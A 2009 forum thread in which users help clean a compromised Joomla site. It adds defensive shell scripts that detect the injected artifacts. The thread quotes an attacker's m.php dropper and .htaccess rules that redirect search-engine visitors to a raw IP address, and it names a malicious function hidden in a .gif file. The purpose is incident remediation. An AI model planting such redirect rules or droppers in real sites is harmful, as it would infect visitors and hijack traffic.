Urgent PHP/Joomla help please!

dpw
Topic # 30877 posted on 24-FEB-2009 13:59

Hi folks,

Please excuse me if this message sounds curt in any way. I am getting horribly frustrated with PHP and Joomla - most probably due to my lack of knowledge in the subject matters. It's doing my head in!

It seems one of the sites I created a few years ago has been compromised. There is now an obfuscated JavaScript snippet at the bottom of each page. I have no idea where this snippet is coming from but some AV software reports it as a Trojan. I'm guessing this links to some malware site somewhere.

The website in question - www.bernesemountaindog.co.nz - has just been upgraded with a full set of 1.0.15 files. I exported the DB through PhpMyAdmin and a scan through the generated SQL revealed no similar content in the DB. I had a look at the template's index.php and nothing there either. I don't know Joomla or PHP enough to look further unfortunately.

I am posting it in this forum for lack of a more appropriate sounding one. Please folks - I'm sure there're some PHP or Joomla gurus out there. Any assistance would be greatly appreciated!

Cheers,
Dany.


This discussion is locked (either by moderator or because no new reply was posted within 30 days) 


casper021
Reply # 197762 posted on 24-FEB-2009 14:41

You have a problem: your website has been injected with the Yahoo counter script.

Look for the following line in your pages, which is the beginning of the script:

script language=javascript><!-- Yahoo! Counter starts

Also I would recommend taking the website down as it will infect your website visitors.

There are a number of ways to fix it; you can google "script language=javascript><!-- Yahoo! Counter starts"

What I would recommend is the following:

1) Take the website down (you can set it to offline in Joomla).
2) Copy all the files to your PC at home.
3) Run a search on all files for the script (I think it mainly infects index.* and home.* and default.* files but I may be wrong on this one).
4) Remove all the script injections from all the files (note the names of the files you have modified).
5) Re-upload the files back to the server.
6) Change the permission on the files you modified above to 644.

I hope this will help. Also, if the files are executable, like script files, you may need to set them to 744.





Internet Marketing Resources   ||  Free eBooks  ||  Internet Secrets


dpw
Reply # 197764 posted on 24-FEB-2009 14:53

This is what's bugging me - I've searched with a couple of tools but nothing returned. I have taken the site down for now and yes, I already downloaded a copy of the site and its DB.

I'm about to do another search through the files. Just to confirm, this command, executed from the root of the site's folder:

grep -R "Yahoo! Counter" *

should look for what I want, right?

D.


casper021
Reply # 197773 posted on 24-FEB-2009 15:44

Yep, if you are running Linux, grep -R "Yahoo! Counter" * should do the job, or even
grep -R "Yahoo" ./*

Well, earlier I had a look at the source of your main page just by going to view source from Firefox and I could see the script at the bottom.

Who is your webhost?

Also, the other option is to do a diff between your files and a clean Joomla download.

Also have a look at your webhosting folder for the following files:

m.php

rename("ht",".htaccess");
unlink("m.php");
echo "OK";

and ht

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC]
RewriteRule .* http://87.248.180.89/topic.html?s=s [R,L]

I think they might also have something to do with it.

If you find them, just rename them and see if it will fix your problem.




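A check for the referer-conditional redirect shown in the post above, as an added example that is not part of the thread: it lists .htaccess rules that redirect to an absolute URL only when a Referer condition matches (so the redirect never fires when the page is opened directly) and looks for the m.php and ht files. The function names and the sample tree are constructed for illustration; the rule text in the sample is copied from the post.

```shell
#!/bin/sh
# Added example, not from the thread. Heuristic only: hits are candidates for review.

# Print "<file>\t<target>" for every RewriteRule under $1 that redirects to an
# absolute URL and is guarded by a RewriteCond on the Referer header.
audit_htaccess() {
    find "$1" -type f -name '.htaccess' | while IFS= read -r f; do
        awk -v file="$f" '
            { line = tolower($0) }
            line ~ /^[ \t]*rewritecond[ \t]+%[{]http_referer[}]/ { ref = 1 }
            line ~ /^[ \t]*rewriterule[ \t]/ {
                if (ref && tolower($3) ~ /^https?:\/\//)
                    printf "%s\t%s\n", file, $3
                ref = 0   # conditions apply only to the rule that follows them
            }
        ' "$f"
    done
}

# List the staging files named in the post (m.php and ht) if present under $1.
find_staging_files() {
    find "$1" -type f \( -name 'm.php' -o -name 'ht' \) | sort
}

# Constructed sample tree: one rule set copied from the post, one benign one.
make_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/administrator"
    cat > "$d/.htaccess" <<'EOF'
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC]
RewriteRule .* http://87.248.180.89/topic.html?s=s [R,L]
EOF
    cat > "$d/administrator/.htaccess" <<'EOF'
RewriteEngine On
RewriteRule ^index\.html$ index.php [L]
EOF
    : > "$d/ht"
    printf '%s\n' "$d"
}

tree=$(make_sample_tree)
audit_htaccess "$tree"
find_staging_files "$tree"
rm -rf "$tree"
```
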


dpw
Reply # 197820 posted on 24-FEB-2009 18:42

Thanks, I can't find the file m.php anywhere, and I'm not using .htaccess in my folders - everything is probably inherited from the parent directory. Are you suggesting I should create one with that content?

My webhost is kiwihosting.net



casper021
Reply # 197874 posted on 24-FEB-2009 21:54

No no no no, do not create one, as this is an example of a hacked one, coz one of my Joomla websites has been injected with JavaScript and that was one of the things I found during my investigation.





gabba
Reply # 198086 posted on 25-FEB-2009 19:54

Hi

Can't be much help sorry, but if you have not already, then the Joomla security thread is a good read (for 1.0.15):

http://forum.joomla.org/viewforum.php?f=267

esp. the security checklist

...but in the spirit of TRYING to help, you might find some more info here (or try a search in the Joomla forums - there appears to be a bit there):

http://forum.joomla.org/viewtopic.php?p=1581519

Thanks for the headsup tho' I'm off to check my joomla sites.

Cheers


casper021
Reply # 198212 posted on 26-FEB-2009 12:11

Here is the final solution which seems to fix this issue:

1) Download your website to your computer.
2) Restore the .htaccess file to the original one from the original install, or if you are not using it just delete it or delete everything from it.
3) Do a search through your website files for the following code: if(!function_exists('tmp_lkojfghx'))…
A good program to do it is wingrep. This code can be in any file or can be a separate file; in the website this post is referring to, it was found in the submenu-on1.gif file, and this file contained only one function.
4) Remove that function from your code, or remove the file if it is in a separate file.
5) Re-upload your new .htaccess file and any other files you have modified.

That should fix it.

Good luck




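The search in step 3 above, extended to the case the post describes of PHP stored under an image name, as an added example that is not part of the thread: it checks image-named files for a real GIF/PNG/JPEG signature and searches all files for the two marker strings quoted in the thread. Function names and the sample tree are constructed, and the function body in the sample is a placeholder, not the real payload.

```shell
#!/bin/sh
# Added example, not from the thread. Run it against a downloaded copy of the site.

# Succeeds if $1 starts with a GIF, PNG or JPEG signature.
has_image_magic() {
    sig=$(head -c 4 "$1" | od -An -tx1 | tr -d ' \n')
    case "$sig" in
        47494638|89504e47|ffd8ff*) return 0 ;;
        *) return 1 ;;
    esac
}

# Print "<reason>\t<file>" for image-named files that are not images at all,
# or that are images with PHP source markers embedded in them.
scan_fake_images() {
    find "$1" -type f \( -iname '*.gif' -o -iname '*.png' -o -iname '*.jpg' \
        -o -iname '*.jpeg' \) | sort | while IFS= read -r f; do
        if ! has_image_magic "$f"; then
            printf 'bad-magic\t%s\n' "$f"
        elif grep -Eaq '<\?php|function_exists[[:space:]]*\(' "$f"; then
            printf 'php-marker\t%s\n' "$f"
        fi
    done
}

# List files of any type that contain either marker string quoted in the thread.
scan_markers() {
    grep -RlaF -e 'tmp_lkojfghx' -e 'Yahoo! Counter starts' "$1" | sort
}

# Constructed sample tree: one genuine GIF header, one PHP file named .gif,
# and one page carrying the counter comment.
make_sample_site() {
    d=$(mktemp -d)
    mkdir -p "$d/images"
    printf 'GIF89a\001\000\001\000' > "$d/images/logo.gif"
    printf '%s\n' "<?php if(!function_exists('tmp_lkojfghx')){ /* placeholder */ } ?>" \
        > "$d/images/submenu-on1.gif"
    printf '%s\n' '<html></html>' '<!-- Yahoo! Counter starts (placeholder) -->' \
        > "$d/index.php"
    printf '%s\n' "$d"
}

site=$(make_sample_site)
scan_fake_images "$site"
scan_markers "$site"
rm -rf "$site"
```
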


dpw
Reply # 198215 posted on 26-FEB-2009 12:27

casper021:

Here is the final solution which seems to fix this issue:

1) Download your website to your computer.
2) Restore the .htaccess file to the original one from the original install, or if you are not using it just delete it or delete everything from it.
3) Do a search through your website files for the following code: if(!function_exists('tmp_lkojfghx'))…
A good program to do it is wingrep. This code can be in any file or can be a separate file; in the website this post is referring to, it was found in the submenu-on1.gif file, and this file contained only one function.
4) Remove that function from your code, or remove the file if it is in a separate file.
5) Re-upload your new .htaccess file and any other files you have modified.



Thanks Casper - that has fixed it for now. I'll be interested in hearing how the code in a gif-prefixed file gets executed though!

D.


 